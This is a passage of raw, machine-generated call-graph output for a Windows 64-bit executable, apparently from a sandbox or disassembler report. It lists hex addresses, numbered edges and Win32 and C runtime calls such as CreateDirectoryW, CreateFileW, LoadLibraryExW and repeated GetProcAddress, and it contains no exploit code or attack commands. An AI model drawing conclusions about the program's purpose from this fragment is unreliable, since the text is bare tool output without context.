7ff7b10f7a41 17721->17730 17751 7ff7b1109084 17721->17751 17754 7ff7b10f8b70 17721->17754 17723->16783 17723->16787 17728 7ff7b10f8ce0 59 API calls 17725->17728 17731 7ff7b10f7ac7 __std_exception_copy 17728->17731 17732 7ff7b10f8bd0 57 API calls 17730->17732 17746 7ff7b10f7a7a __std_exception_copy 17730->17746 17733 7ff7b10f8bd0 57 API calls 17731->17733 17731->17746 17734 7ff7b10f7a57 17732->17734 17735 7ff7b10f7ae5 17733->17735 17736 7ff7b10f7a5c 17734->17736 17737 7ff7b10f7a99 SetEnvironmentVariableW 17734->17737 17738 7ff7b10f7b1d SetEnvironmentVariableW 17735->17738 17739 7ff7b10f7aea 17735->17739 17740 7ff7b10f8bd0 57 API calls 17736->17740 17737->17746 17738->17746 17742 7ff7b10f8bd0 57 API calls 17739->17742 17741 7ff7b10f7a6c 17740->17741 17743 7ff7b11083cc 38 API calls 17741->17743 17744 7ff7b10f7afa 17742->17744 17743->17746 17745 7ff7b11083cc 38 API calls 17744->17745 17745->17746 17746->17720 17748 7ff7b10f2835 17747->17748 17749 7ff7b11052f8 48 API calls 17748->17749 17750 7ff7b10f2854 17749->17750 17750->17721 17793 7ff7b1108cb0 17751->17793 17755 7ff7b10f8b96 CreateDirectoryW 17754->17755 17756 7ff7b10f8b80 17754->17756 17755->17721 17757 7ff7b10f2c30 59 API calls 17756->17757 17758 7ff7b10f8b8c 17757->17758 17758->17721 17760 7ff7b10f742c 17759->17760 17761 7ff7b10f8bd0 57 API calls 17760->17761 17762 7ff7b10f744e 17761->17762 17763 7ff7b10f7456 17762->17763 17764 7ff7b10f7469 ExpandEnvironmentStringsW 17762->17764 17765 7ff7b10f2b10 59 API calls 17763->17765 17766 7ff7b10f748f __std_exception_copy 17764->17766 17771 7ff7b10f7462 17765->17771 17767 7ff7b10f74a6 17766->17767 17768 7ff7b10f7493 17766->17768 17773 7ff7b10f74b4 17767->17773 17774 7ff7b10f74c0 17767->17774 17769 7ff7b10f2b10 59 API calls 17768->17769 17769->17771 17770 7ff7b10fbe00 _wfindfirst32i64 8 API calls 17772 7ff7b10f7588 17770->17772 17771->17770 17772->17746 17783 7ff7b11083cc 17772->17783 17924 7ff7b1107f84 17773->17924 17931 7ff7b1106908 17774->17931 17777 7ff7b10f74be 17778 7ff7b10f74da 17777->17778 17781 7ff7b10f74ed memcpy_s 17777->17781 17779 7ff7b10f2b10 59 API calls 17778->17779 17779->17771 17780 7ff7b10f7562 CreateDirectoryW 17780->17771 17781->17780 17782 7ff7b10f753c CreateDirectoryW 17781->17782 17782->17781 17784 7ff7b11083d9 17783->17784 17785 7ff7b11083ec 17783->17785 17787 7ff7b1105aa4 _get_daylight 11 API calls 17784->17787 18023 7ff7b1108050 17785->18023 17789 7ff7b11083de 17787->17789 17834 7ff7b11121a8 17793->17834 17893 7ff7b1111f20 17834->17893 17914 7ff7b1111298 EnterCriticalSection 17893->17914 17925 7ff7b1107fd5 17924->17925 17926 7ff7b1107fa2 17924->17926 17925->17777 17926->17925 17927 7ff7b1111434 _wfindfirst32i64 37 API calls 17926->17927 17928 7ff7b1107fd1 17927->17928 17928->17925 17929 7ff7b110b4a4 _wfindfirst32i64 17 API calls 17928->17929 17930 7ff7b1108005 17929->17930 17932 7ff7b1106924 17931->17932 17933 7ff7b1106992 17931->17933 17932->17933 17935 7ff7b1106929 17932->17935 17968 7ff7b1110a80 17933->17968 17937 7ff7b1106941 17935->17937 17938 7ff7b110695e 17935->17938 17943 7ff7b11066d8 GetFullPathNameW 17937->17943 17951 7ff7b110674c GetFullPathNameW 17938->17951 17944 7ff7b11066fe GetLastError 17943->17944 17947 7ff7b1106714 17943->17947 17952 7ff7b110677f GetLastError 17951->17952 17957 7ff7b1106795 __std_exception_copy 17951->17957 17971 7ff7b1110890 17968->17971 17972 7ff7b11108bb 17971->17972 17973 7ff7b11108d2 17971->17973 18030 7ff7b1111298 EnterCriticalSection 18023->18030 18032 7ff7b10f1716 18031->18032 18033 7ff7b10f172e 18031->18033 18034 7ff7b10f2b10 59 API calls 18032->18034 18035 7ff7b10f1734 18033->18035 18036 7ff7b10f1758 18033->18036 18038 7ff7b10f1722 18034->18038 18161 7ff7b10f12a0 18035->18161 18124 7ff7b10f7c10 18036->18124 18038->16808 18042 7ff7b10f177d 18045 7ff7b10f2870 59 API calls 18042->18045 18043 7ff7b10f17a9 18046 7ff7b10f3fc0 116 API calls 18043->18046 18044 7ff7b10f174f 18044->16808 18048 7ff7b10f1793 18045->18048 18049 7ff7b10f17be 18046->18049 18047 7ff7b10f2b10 59 API calls 18047->18044 18048->16808 18050 7ff7b10f17c6 18049->18050 18051 7ff7b10f17de 18049->18051 18052 7ff7b10f2b10 59 API calls 18050->18052 18053 7ff7b1100df4 73 API calls 18051->18053 18054 7ff7b10f17d5 18052->18054 18055 7ff7b10f17ef 18053->18055 18059 7ff7b110076c 74 API calls 18054->18059 18056 7ff7b10f1813 18055->18056 18057 7ff7b10f17f3 18055->18057 18060 7ff7b10f1831 18056->18060 18061 7ff7b10f1819 18056->18061 18058 7ff7b10f2870 59 API calls 18057->18058 18067 7ff7b10f1809 __std_exception_copy 18058->18067 18062 7ff7b10f1927 18059->18062 18065 7ff7b10f1853 18060->18065 18071 7ff7b10f1872 18060->18071 18143 7ff7b10f1050 18061->18143 18062->16808 18064 7ff7b110076c 74 API calls 18064->18054 18066 7ff7b10f2870 59 API calls 18065->18066 18066->18067 18067->18064 18068 7ff7b1100abc _fread_nolock 53 API calls 18068->18071 18069 7ff7b10f18d5 18072 7ff7b10f2870 59 API calls 18069->18072 18071->18067 18071->18068 18071->18069 18200 7ff7b11011fc 18071->18200 18072->18067 18074 7ff7b10f2d66 18073->18074 18075 7ff7b10f1ee0 49 API calls 18074->18075 18077 7ff7b10f2d99 18075->18077 18076 7ff7b10f30ca 18077->18076 18078 7ff7b10f3e30 49 API calls 18077->18078 18079 7ff7b10f2e07 18078->18079 18080 7ff7b10f3e30 49 API calls 18079->18080 18081 7ff7b10f2e18 18080->18081 18082 7ff7b10f2e75 18081->18082 18083 7ff7b10f2e39 18081->18083 18085 7ff7b10f3190 75 API calls 18082->18085 18283 7ff7b10f3190 18083->18283 18086 7ff7b10f2e73 18085->18086 18087 7ff7b10f2ef6 18086->18087 18088 7ff7b10f2eb4 18086->18088 18089 7ff7b10f3190 75 API calls 18087->18089 18291 7ff7b10f75a0 18088->18291 18091 7ff7b10f2f20 18089->18091 18096 7ff7b10f3190 75 API calls 18091->18096 18101 7ff7b10f2fbc 18091->18101 18093 7ff7b10f3151 18100 7ff7b10f2b10 59 API calls 18093->18100 18094 7ff7b10f2ed7 18095 7ff7b10f2b10 59 API calls 18094->18095 18097 7ff7b10f2ef1 18095->18097 18098 7ff7b10f2f52 18096->18098 18104 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18097->18104 18098->18101 18103 7ff7b10f3190 75 API calls 18098->18103 18099 7ff7b10f1ea0 59 API calls 18102 7ff7b10f300f 18099->18102 18100->18076 18101->18099 18112 7ff7b10f30cf 18101->18112 18102->18076 18107 7ff7b10f1ee0 49 API calls 18102->18107 18106 7ff7b10f2f80 18103->18106 18105 7ff7b10f2fb1 18104->18105 18105->16808 18106->18101 18108 7ff7b10f2f84 18106->18108 18109 7ff7b10f3037 18107->18109 18110 7ff7b10f2b10 59 API calls 18108->18110 18109->18093 18113 7ff7b10f1ee0 49 API calls 18109->18113 18110->18097 18111 7ff7b10f2b10 59 API calls 18119 7ff7b10f3128 18111->18119 18112->18119 18328 7ff7b1105650 18112->18328 18114 7ff7b10f3064 18113->18114 18114->18093 18116 7ff7b10f1ee0 49 API calls 18114->18116 18117 7ff7b10f3091 18116->18117 18117->18093 18120 7ff7b10f1a90 121 API calls 18117->18120 18118 7ff7b10f1700 135 API calls 18118->18119 18119->18093 18119->18111 18119->18118 18125 7ff7b10f7c20 18124->18125 18126 7ff7b10f1ee0 49 API calls 18125->18126 18127 7ff7b10f7c61 18126->18127 18141 7ff7b10f7ce1 18127->18141 18204 7ff7b10f3f50 18127->18204 18129 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18131 7ff7b10f1775 18129->18131 18131->18042 18131->18043 18132 7ff7b10f7d1b 18210 7ff7b10f77c0 18132->18210 18134 7ff7b10f7b60 61 API calls 18142 7ff7b10f7c92 __std_exception_copy 18134->18142 18135 7ff7b10f7cd0 18136 7ff7b10f2c30 59 API calls 18135->18136 18136->18141 18137 7ff7b10f2c30 59 API calls 18137->18132 18139 7ff7b10f7d04 18139->18137 18140 7ff7b10f3fc0 116 API calls 18140->18141 18141->18129 18142->18135 18142->18139 18144 7ff7b10f10a6 18143->18144 18145 7ff7b10f10d3 18144->18145 18146 7ff7b10f10ad 18144->18146 18149 7ff7b10f10ed 18145->18149 18150 7ff7b10f1109 18145->18150 18147 7ff7b10f2b10 59 API calls 18146->18147 18148 7ff7b10f10c0 18147->18148 18148->18067 18151 7ff7b10f2870 59 API calls 18149->18151 18152 7ff7b10f111b 18150->18152 18160 7ff7b10f1137 memcpy_s 18150->18160 18156 7ff7b10f1104 __std_exception_copy 18151->18156 18153 7ff7b10f2870 59 API calls 18152->18153 18153->18156 18154 7ff7b1100abc _fread_nolock 53 API calls 18154->18160 18155 7ff7b1100830 37 API calls 18155->18160 18156->18067 18157 7ff7b10f11fe 18159 7ff7b11011fc 76 API calls 18159->18160 18160->18154 18160->18155 18160->18156 18160->18157 18160->18159 18162 7ff7b10f12b2 18161->18162 18163 7ff7b10f3fc0 116 API calls 18162->18163 18164 7ff7b10f12e2 18163->18164 18165 7ff7b10f1301 18164->18165 18166 7ff7b10f12ea 18164->18166 18168 7ff7b1100df4 73 API calls 18165->18168 18167 7ff7b10f2b10 59 API calls 18166->18167 18196 7ff7b10f12fa __std_exception_copy 18167->18196 18169 7ff7b10f1313 18168->18169 18170 7ff7b10f133d 18169->18170 18171 7ff7b10f1317 18169->18171 18176 7ff7b10f1380 18170->18176 18177 7ff7b10f1358 18170->18177 18172 7ff7b10f2870 59 API calls 18171->18172 18173 7ff7b10f132e 18172->18173 18175 7ff7b110076c 74 API calls 18173->18175 18174 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18179 7ff7b10f1444 18174->18179 18175->18196 18178 7ff7b10f139a 18176->18178 18191 7ff7b10f1453 18176->18191 18180 7ff7b10f2870 59 API calls 18177->18180 18181 7ff7b10f1050 98 API calls 18178->18181 18179->18044 18179->18047 18183 7ff7b10f1373 18180->18183 18185 7ff7b10f13ab 18181->18185 18182 7ff7b10f13b3 18186 7ff7b110076c 74 API calls 18182->18186 18184 7ff7b110076c 74 API calls 18183->18184 18184->18196 18185->18182 18187 7ff7b10f14c2 __std_exception_copy 18185->18187 18188 7ff7b10f13bf 18186->18188 18195 7ff7b110076c 74 API calls 18187->18195 18190 7ff7b10f77c0 64 API calls 18188->18190 18189 7ff7b1100abc _fread_nolock 53 API calls 18189->18191 18192 7ff7b10f13ce 18190->18192 18191->18182 18191->18189 18193 7ff7b10f14ab 18191->18193 18192->18196 18197 7ff7b10f1ee0 49 API calls 18192->18197 18194 7ff7b10f2870 59 API calls 18193->18194 18194->18187 18195->18196 18196->18174 18198 7ff7b10f13fc 18197->18198 18198->18196 18254 7ff7b10f4160 18198->18254 18201 7ff7b110122c 18200->18201 18268 7ff7b1100f4c 18201->18268 18203 7ff7b110124a 18203->18071 18205 7ff7b10f3f5a 18204->18205 18206 7ff7b10f8bd0 57 API calls 18205->18206 18207 7ff7b10f3f82 18206->18207 18208 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18207->18208 18209 7ff7b10f3faa 18208->18209 18209->18132 18209->18134 18209->18142 18211 7ff7b10f77d0 18210->18211 18212 7ff7b10f1ee0 49 API calls 18211->18212 18213 7ff7b10f7801 18212->18213 18214 7ff7b10f7919 18213->18214 18215 7ff7b10f1ee0 49 API calls 18213->18215 18216 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18214->18216 18218 7ff7b10f7828 18215->18218 18217 7ff7b10f792e 18216->18217 18217->18140 18217->18141 18218->18214 18224 7ff7b11066a8 18218->18224 18225 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18224->18225 18227 7ff7b11066bd 18225->18227 18226 7ff7b1110887 18241 7ff7b10fbf34 18226->18241 18227->18226 18231 7ff7b11107a6 18227->18231 18255 7ff7b10f4170 18254->18255 18256 7ff7b10f8bd0 57 API calls 18255->18256 18257 7ff7b10f419e 18256->18257 18269 7ff7b1100f6c 18268->18269 18274 7ff7b1100f99 18268->18274 18270 7ff7b1100f76 18269->18270 18271 7ff7b1100fa1 18269->18271 18269->18274 18274->18203 18284 7ff7b10f31c4 18283->18284 18285 7ff7b11050a4 49 API calls 18284->18285 18286 7ff7b10f31ea 18285->18286 18287 7ff7b10f31fb 18286->18287 18343 7ff7b11063cc 18286->18343 18289 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18287->18289 18290 7ff7b10f3219 18289->18290 18290->18086 18292 7ff7b10f75ae 18291->18292 18293 7ff7b10f3fc0 116 API calls 18292->18293 18294 7ff7b10f75dd 18293->18294 18295 7ff7b10f1ee0 49 API calls 18294->18295 18296 7ff7b10f7606 18295->18296 18297 7ff7b10f760d 18296->18297 18298 7ff7b10f3f50 57 API calls 18296->18298 18299 7ff7b10f7789 18297->18299 18301 7ff7b10f76e9 18297->18301 18300 7ff7b10f7620 18298->18300 18303 7ff7b110076c 74 API calls 18299->18303 18321 7ff7b10f7785 18299->18321 18302 7ff7b10f76a4 18300->18302 18311 7ff7b10f7b60 61 API calls 18300->18311 18315 7ff7b10f763e __std_exception_copy 18300->18315 18524 7ff7b1100804 18301->18524 18305 7ff7b10f77c0 64 API calls 18302->18305 18303->18321 18310 7ff7b10f76af 18305->18310 18306 7ff7b10f768d 18314 7ff7b10f2c30 59 API calls 18306->18314 18307 7ff7b10f7677 18312 7ff7b10f2c30 59 API calls 18307->18312 18308 7ff7b10f76ee 18318 7ff7b1100abc _fread_nolock 53 API calls 18308->18318 18322 7ff7b1100830 37 API calls 18308->18322 18323 7ff7b11011fc 76 API calls 18308->18323 18324 7ff7b10f772c 18308->18324 18325 7ff7b1100804 37 API calls 18308->18325 18327 7ff7b10f7766 18308->18327 18309 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18313 7ff7b10f2ece 18309->18313 18310->18297 18317 7ff7b10f3fc0 116 API calls 18310->18317 18311->18315 18312->18297 18313->18093 18313->18094 18314->18302 18315->18306 18315->18307 18316 7ff7b110076c 74 API calls 18317->18297 18318->18308 18321->18309 18322->18308 18323->18308 18530 7ff7b11090a0 18324->18530 18325->18308 18327->18316 18329 7ff7b110565d 18328->18329 18330 7ff7b110568a 18328->18330 18331 7ff7b1105614 18329->18331 18333 7ff7b1105aa4 _get_daylight 11 API calls 18329->18333 18332 7ff7b11056ad 18330->18332 18336 7ff7b11056c9 18330->18336 18331->18112 18335 7ff7b1105aa4 _get_daylight 11 API calls 18332->18335 18334 7ff7b1105667 18333->18334 18337 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 18334->18337 18338 7ff7b11056b2 18335->18338 18339 7ff7b1105578 45 API calls 18336->18339 18340 7ff7b1105672 18337->18340 18341 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 18338->18341 18342 7ff7b11056bd 18339->18342 18340->18112 18341->18342 18342->18112 18344 7ff7b11063f5 18343->18344 18345 7ff7b11063e9 18343->18345 18385 7ff7b1105578 18344->18385 18360 7ff7b1105ce0 18345->18360 18351 7ff7b110642d 18396 7ff7b1105b64 18351->18396 18353 7ff7b110649d 18355 7ff7b1105ce0 69 API calls 18353->18355 18354 7ff7b1106489 18356 7ff7b11063ee 18354->18356 18357 7ff7b110b4ec __free_lconv_num 11 API calls 18354->18357 18358 7ff7b11064a9 18355->18358 18356->18287 18357->18356 18358->18356 18361 7ff7b1105cfa 18360->18361 18362 7ff7b1105d17 18360->18362 18364 7ff7b1105a84 _fread_nolock 11 API calls 18361->18364 18362->18361 18363 7ff7b1105d2a CreateFileW 18362->18363 18365 7ff7b1105d94 18363->18365 18366 7ff7b1105d5e 18363->18366 18367 7ff7b1105cff 18364->18367 18444 7ff7b11062bc 18365->18444 18418 7ff7b1105e34 GetFileType 18366->18418 18370 7ff7b1105aa4 _get_daylight 11 API calls 18367->18370 18373 7ff7b1105d07 18370->18373 18378 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 18373->18378 18376 7ff7b1105d9d 18377 7ff7b1105dc8 18380 7ff7b1105d12 18378->18380 18380->18356 18386 7ff7b110559c 18385->18386 18392 7ff7b1105597 18385->18392 18387 7ff7b110bcf0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18386->18387 18386->18392 18388 7ff7b11055b7 18387->18388 18506 7ff7b110e524 18388->18506 18392->18351 18393 7ff7b110f9c4 18392->18393 18514 7ff7b110f7b0 18393->18514 18397 7ff7b1105bb2 18396->18397 18398 7ff7b1105b8e 18396->18398 18399 7ff7b1105c0c 18397->18399 18400 7ff7b1105bb7 18397->18400 18402 7ff7b110b4ec __free_lconv_num 11 API calls 18398->18402 18407 7ff7b1105b9d 18398->18407 18401 7ff7b11101e0 _fread_nolock MultiByteToWideChar 18399->18401 18403 7ff7b1105bcc 18400->18403 18404 7ff7b110b4ec __free_lconv_num 11 API calls 18400->18404 18400->18407 18410 7ff7b1105c28 18401->18410 18402->18407 18405 7ff7b110e19c _fread_nolock 12 API calls 18403->18405 18404->18403 18405->18407 18406 7ff7b1105c2f GetLastError 18407->18353 18407->18354 18408 7ff7b1105c6a 18408->18407 18410->18406 18410->18408 18411 7ff7b1105c5d 18410->18411 18414 7ff7b110b4ec __free_lconv_num 11 API calls 18410->18414 18414->18411 18419 7ff7b1105e82 18418->18419 18420 7ff7b1105f3f 18418->18420 18421 7ff7b1105eae GetFileInformationByHandle 18419->18421 18425 7ff7b11061b8 21 API calls 18419->18425 18422 7ff7b1105f69 18420->18422 18423 7ff7b1105f47 18420->18423 18426 7ff7b1105f5a GetLastError 18421->18426 18427 7ff7b1105ed7 18421->18427 18424 7ff7b1105f8c PeekNamedPipe 18422->18424 18443 7ff7b1105f2a 18422->18443 18423->18426 18428 7ff7b1105f4b 18423->18428 18424->18443 18429 7ff7b1105e9c 18425->18429 18432 7ff7b1105a18 _fread_nolock 11 API calls 18426->18432 18430 7ff7b110607c 51 API calls 18427->18430 18431 7ff7b1105aa4 _get_daylight 11 API calls 18428->18431 18429->18421 18429->18443 18431->18443 18432->18443 18433 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18435 7ff7b1105d6c 18433->18435 18443->18433 18445 7ff7b11062f2 18444->18445 18446 7ff7b1105aa4 _get_daylight 11 API calls 18445->18446 18464 7ff7b110638a __std_exception_copy 18445->18464 18448 7ff7b1106304 18446->18448 18447 7ff7b10fbe00 _wfindfirst32i64 8 API calls 18449 7ff7b1105d99 18447->18449 18450 7ff7b1105aa4 _get_daylight 11 API calls 18448->18450 18449->18376 18449->18377 18451 7ff7b110630c 18450->18451 18464->18447 18507 7ff7b110e539 18506->18507 18508 7ff7b11055da 18506->18508 18507->18508 18509 7ff7b1113f54 45 API calls 18507->18509 18510 7ff7b110e590 18508->18510 18509->18508 18511 7ff7b110e5a5 18510->18511 18513 7ff7b110e5b8 18510->18513 18512 7ff7b11132a0 45 API calls 18511->18512 18511->18513 18512->18513 18513->18392 18515 7ff7b110f80d 18514->18515 18522 7ff7b110f808 __vcrt_InitializeCriticalSectionEx 18514->18522 18515->18351 18516 7ff7b110f83d LoadLibraryW 18517 7ff7b110f912 18516->18517 18518 7ff7b110f862 GetLastError 18516->18518 18519 7ff7b110f932 GetProcAddress 18517->18519 18521 7ff7b110f929 FreeLibrary 18517->18521 18518->18522 18519->18515 18520 7ff7b110f943 18519->18520 18520->18515 18521->18519 18522->18515 18522->18516 18522->18519 18523 7ff7b110f89c LoadLibraryExW 18522->18523 18523->18517 18523->18522 18525 7ff7b110081d 18524->18525 18526 7ff7b110080d 18524->18526 18525->18308 18527 7ff7b1105aa4 _get_daylight 11 API calls 18526->18527 18528 7ff7b1100812 18527->18528 18551 7ff7b110affd 18550->18551 18552 7ff7b10f812a 18550->18552 18553 7ff7b1105aa4 _get_daylight 11 API calls 18551->18553 18556 7ff7b1108c10 18552->18556 18554 7ff7b110b002 18553->18554 18555 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 18554->18555 18555->18552 18557 7ff7b1108c19 18556->18557 18558 7ff7b1108c2e 18556->18558 18559 7ff7b1105a84 _fread_nolock 11 API calls 18557->18559 18560 7ff7b1105a84 _fread_nolock 11 API calls 18558->18560 18564 7ff7b1108c26 18558->18564 18562 7ff7b1108c69 18560->18562 18564->16830 18607 7ff7b11069bc 18606->18607 18608 7ff7b11069e2 18607->18608 18611 7ff7b1106a15 18607->18611 18609 7ff7b1105aa4 _get_daylight 11 API calls 18608->18609 18610 7ff7b11069e7 18609->18610 18612 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 18610->18612 18613 7ff7b1106a1b 18611->18613 18614 7ff7b1106a28 18611->18614 18618 7ff7b10f4019 18612->18618 18616 7ff7b1105aa4 _get_daylight 11 API calls 18613->18616 18625 7ff7b110b7cc 18614->18625 18616->18618 18618->16886 18638 7ff7b1111298 EnterCriticalSection 18625->18638 18986 7ff7b1109680 18985->18986 18989 7ff7b110915c 18986->18989 18988 7ff7b1109699 18988->16896 18990 7ff7b1109177 18989->18990 18991 7ff7b11091a6 18989->18991 18993 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 18990->18993 18999 7ff7b110594c EnterCriticalSection 18991->18999 18998 7ff7b1109197 18993->18998 18998->18988 19001 7ff7b1100563 19000->19001 19002 7ff7b1100591 19000->19002 19003 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 19001->19003 19004 7ff7b1100583 19002->19004 19010 7ff7b110594c EnterCriticalSection 19002->19010 19003->19004 19004->16900 19012 7ff7b10f3fc0 116 API calls 19011->19012 19013 7ff7b10f15b7 19012->19013 19014 7ff7b10f15bf 19013->19014 19015 7ff7b10f15e0 19013->19015 19017 7ff7b10f2b10 59 API calls 19014->19017 19016 7ff7b1100df4 73 API calls 19015->19016 19018 7ff7b10f15f1 19016->19018 19019 7ff7b10f15cf 19017->19019 19020 7ff7b10f15f5 19018->19020 19021 7ff7b10f1611 19018->19021 19019->16905 19022 7ff7b10f2870 59 API calls 19020->19022 19023 7ff7b10f1641 19021->19023 19024 7ff7b10f1621 19021->19024 19033 7ff7b10f160c __std_exception_copy 19022->19033 19026 7ff7b10f1656 19023->19026 19030 7ff7b10f166d 19023->19030 19025 7ff7b10f2870 59 API calls 19024->19025 19025->19033 19029 7ff7b10f1050 98 API calls 19026->19029 19027 7ff7b110076c 74 API calls 19028 7ff7b10f16e7 19027->19028 19028->16905 19029->19033 19031 7ff7b1100abc _fread_nolock 53 API calls 19030->19031 19032 7ff7b10f16ae 19030->19032 19030->19033 19031->19030 19034 7ff7b10f2870 59 API calls 19032->19034 19033->19027 19034->19033 19036 7ff7b10f19c3 19035->19036 19038 7ff7b10f195f 19035->19038 19036->16923 19037 7ff7b1105650 45 API calls 19037->19038 19038->19036 19038->19037 19040 7ff7b10f8bd0 57 API calls 19039->19040 19041 7ff7b10f8277 LoadLibraryExW 19040->19041 19042 7ff7b10f8294 __std_exception_copy 19041->19042 19042->16932 19044 7ff7b10f6f3c GetProcAddress 19043->19044 19048 7ff7b10f6f19 19043->19048 19045 7ff7b10f6f61 GetProcAddress 19044->19045 19044->19048 19046 7ff7b10f6f86 GetProcAddress 19045->19046 19045->19048 19046->19048 19049 7ff7b10f6fae GetProcAddress 19046->19049 19047 7ff7b10f29c0 57 API calls 19050 7ff7b10f6f2c 19047->19050 19048->19047 19049->19048 19051 7ff7b10f6fd6 GetProcAddress 19049->19051 19050->16939 19051->19048 19052 7ff7b10f6ffe GetProcAddress 19051->19052 19053 7ff7b10f7026 GetProcAddress 19052->19053 19054 7ff7b10f701a 19052->19054 19055 7ff7b10f7042 19053->19055 19056 7ff7b10f704e GetProcAddress 19053->19056 19054->19053 19055->19056 19103 7ff7b10f5bd0 19102->19103 19104 7ff7b10f1ee0 49 API calls 19103->19104 19105 7ff7b10f5c02 19104->19105 19106 7ff7b10f5c2b 19105->19106 19107 7ff7b10f5c0b 19105->19107 19109 7ff7b10f5c82 19106->19109 19110 7ff7b10f4040 49 API calls 19106->19110 19108 7ff7b10f2b10 59 API calls 19107->19108 19129 7ff7b10f5c21 19108->19129 19111 7ff7b10f4040 49 API calls 19109->19111 19113 7ff7b10f5c4c 19110->19113 19112 7ff7b10f5c9b 19111->19112 19114 7ff7b10f5cb9 19112->19114 19117 7ff7b10f2b10 59 API calls 19112->19117 19115 7ff7b10f5c6a 19113->19115 19119 7ff7b10f2b10 59 API calls 19113->19119 19118 7ff7b10f8260 58 API calls 19114->19118 19120 7ff7b10f3f50 57 API calls 19115->19120 19116 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19121 7ff7b10f344e 19116->19121 19117->19114 19122 7ff7b10f5cc6 19118->19122 19119->19115 19123 7ff7b10f5c74 19120->19123 19121->16953 19130 7ff7b10f5d20 19121->19130 19124 7ff7b10f5ced 19122->19124 19125 7ff7b10f5ccb 19122->19125 19123->19109 19128 7ff7b10f8260 58 API calls 19123->19128 19200 7ff7b10f51e0 GetProcAddress 19124->19200 19126 7ff7b10f29c0 57 API calls 19125->19126 19126->19129 19128->19109 19129->19116 19284 7ff7b10f4de0 19130->19284 19132 7ff7b10f5d44 19133 7ff7b10f5d5d 19132->19133 19134 7ff7b10f5d4c 19132->19134 19291 7ff7b10f4520 19133->19291 19135 7ff7b10f2b10 59 API calls 19134->19135 19141 7ff7b10f5d58 19135->19141 19138 7ff7b10f5d69 19140 7ff7b10f2b10 59 API calls 19138->19140 19139 7ff7b10f5d7a 19142 7ff7b10f5d87 19139->19142 19143 7ff7b10f5d98 19139->19143 19140->19141 19141->16955 19144 7ff7b10f2b10 59 API calls 19142->19144 19295 7ff7b10f4870 19143->19295 19144->19141 19172 7ff7b10f5937 19171->19172 19172->19172 19173 7ff7b10f5960 19172->19173 19179 7ff7b10f5977 __std_exception_copy 19172->19179 19174 7ff7b10f2b10 59 API calls 19173->19174 19175 7ff7b10f596c 19174->19175 19175->16957 19176 7ff7b10f5a65 19176->16957 19177 7ff7b10f1590 122 API calls 19177->19179 19178 7ff7b10f2b10 59 API calls 19178->19179 19179->19176 19179->19177 19179->19178 19201 7ff7b10f5202 19200->19201 19202 7ff7b10f5220 GetProcAddress 19200->19202 19204 7ff7b10f29c0 57 API calls 19201->19204 19202->19201 19203 7ff7b10f5245 GetProcAddress 19202->19203 19203->19201 19205 7ff7b10f526a GetProcAddress 19203->19205 19206 7ff7b10f5215 19204->19206 19205->19201 19207 7ff7b10f5292 GetProcAddress 19205->19207 19206->19129 19207->19201 19208 7ff7b10f52ba GetProcAddress 19207->19208 19208->19201 19209 7ff7b10f52e2 GetProcAddress 19208->19209 19209->19201 19210 7ff7b10f530a GetProcAddress 19209->19210 19211 7ff7b10f5326 19210->19211 19212 7ff7b10f5332 GetProcAddress 19210->19212 19211->19212 19213 7ff7b10f534e 19212->19213 19214 7ff7b10f535a GetProcAddress 19212->19214 19213->19214 19215 7ff7b10f5376 19214->19215 19216 7ff7b10f5382 GetProcAddress 19214->19216 19215->19216 19217 7ff7b10f539e 19216->19217 19218 7ff7b10f53aa GetProcAddress 19216->19218 19217->19218 19219 7ff7b10f53c6 19218->19219 19220 7ff7b10f53d2 GetProcAddress 19218->19220 19219->19220 19286 7ff7b10f4e05 19284->19286 19285 7ff7b10f4e0d 19285->19132 19286->19285 19289 7ff7b10f4f9f 19286->19289 19326 7ff7b1107598 19286->19326 19287 7ff7b10f514a __std_exception_copy 19287->19132 19288 7ff7b10f4240 47 API calls 19288->19289 19289->19287 19289->19288 19292 7ff7b10f4550 19291->19292 19293 7ff7b10fbe00 _wfindfirst32i64 8 API calls 19292->19293 19294 7ff7b10f45ba 19293->19294 19294->19138 19294->19139 19296 7ff7b10f48e1 19295->19296 19300 7ff7b10f4884 19295->19300 19297 7ff7b10f43c0 57 API calls 19296->19297 19301 7ff7b10f48cc 19300->19301 19384 7ff7b10f43c0 19300->19384 19327 7ff7b11075c8 19326->19327 19330 7ff7b1106a94 19327->19330 19329 7ff7b11075f8 19329->19286 19331 7ff7b1106ac5 19330->19331 19332 7ff7b1106ad7 19330->19332 19333 7ff7b1105aa4 _get_daylight 11 API calls 19331->19333 19334 7ff7b1106b21 19332->19334 19336 7ff7b1106ae4 19332->19336 19335 7ff7b1106aca 19333->19335 19337 7ff7b1106b3c 19334->19337 19341 7ff7b1104ee0 45 API calls 19334->19341 19339 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 19335->19339 19340 7ff7b110b3b8 _invalid_parameter_noinfo 37 API calls 19336->19340 19342 7ff7b1106b5e 19337->19342 19351 7ff7b1107520 19337->19351 19349 7ff7b1106ad5 19339->19349 19340->19349 19341->19337 19343 7ff7b1106bff 19342->19343 19344 7ff7b1105aa4 _get_daylight 11 API calls 19342->19344 19345 7ff7b1105aa4 _get_daylight 11 API calls 19343->19345 19343->19349 19346 7ff7b1106bf4 19344->19346 19347 7ff7b1106caa 19345->19347 19348 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 19346->19348 19350 7ff7b110b484 _invalid_parameter_noinfo 37 API calls 19347->19350 19348->19343 19349->19329 19350->19349 19352 7ff7b1107543 19351->19352 19353 7ff7b110755a 19351->19353 19357 7ff7b1110f28 19352->19357 19355 7ff7b1107548 19353->19355 19362 7ff7b1110f58 19353->19362 19355->19337 19358 7ff7b110bcf0 